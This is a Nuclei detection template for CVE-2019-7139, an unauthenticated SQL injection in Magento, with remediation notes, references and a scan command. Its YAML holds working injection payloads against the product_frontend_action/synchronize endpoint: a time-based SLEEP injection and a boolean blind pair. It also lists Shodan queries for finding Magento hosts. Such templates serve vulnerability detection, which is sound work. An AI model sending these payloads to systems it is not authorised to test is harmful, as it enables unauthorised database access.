Magento - SQL Injection
ID: CVE-2019-7139
Severity: critical
Author: MaStErChO
Tags: time-based-sqli,cve,cve2019,sqli,magento
Description
An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
YAML Source
```yaml
id: CVE-2019-7139

info:
  name: Magento - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
    An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.
  remediation: |
    This issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2.
  reference:
    - https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
    - https://www.ambionics.io/blog/magento-sqli
    - https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13
    - https://github.com/koutto/jok3r-pocs
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7139
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7139
    cwe-id: CWE-89
    epss-score: 0.00582
    epss-percentile: 0.778
    cpe: cpe:2.3:a:magento:magento:*:*:*:*:open_source:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: magento
    product: magento
    framework: magento
    shodan-query:
      - http.component:"Magento"
      - cpe:"cpe:2.3:a:magento:magento"
      - http.component:"magento"
  tags: time-based-sqli,cve,cve2019,sqli,magento

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "text/x-magento-init")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    stop-at-first-match: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_1>=8'
          - 'contains(content_type_1, "application/json")'
        condition: and

      - type: dsl
        name: blind-based
        dsl:
          - 'contains(content_type_2, "application/json") && contains(content_type_3, "application/json")'
          - 'status_code_2 == 200 && status_code_3 == 400'
          - 'len(body_2) == 2 && len(body_3) == 2'
        condition: and
# digest: 4b0a00483046022100eeaf22bda786fca60002b3f2a4921720e83cac9f5fc5c91fa770a55c26664b3a022100b0cfe2317edaa15b499095eebb7a850981c25cbd5ce9d40d05e03baac019d4d9:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-7139.yaml"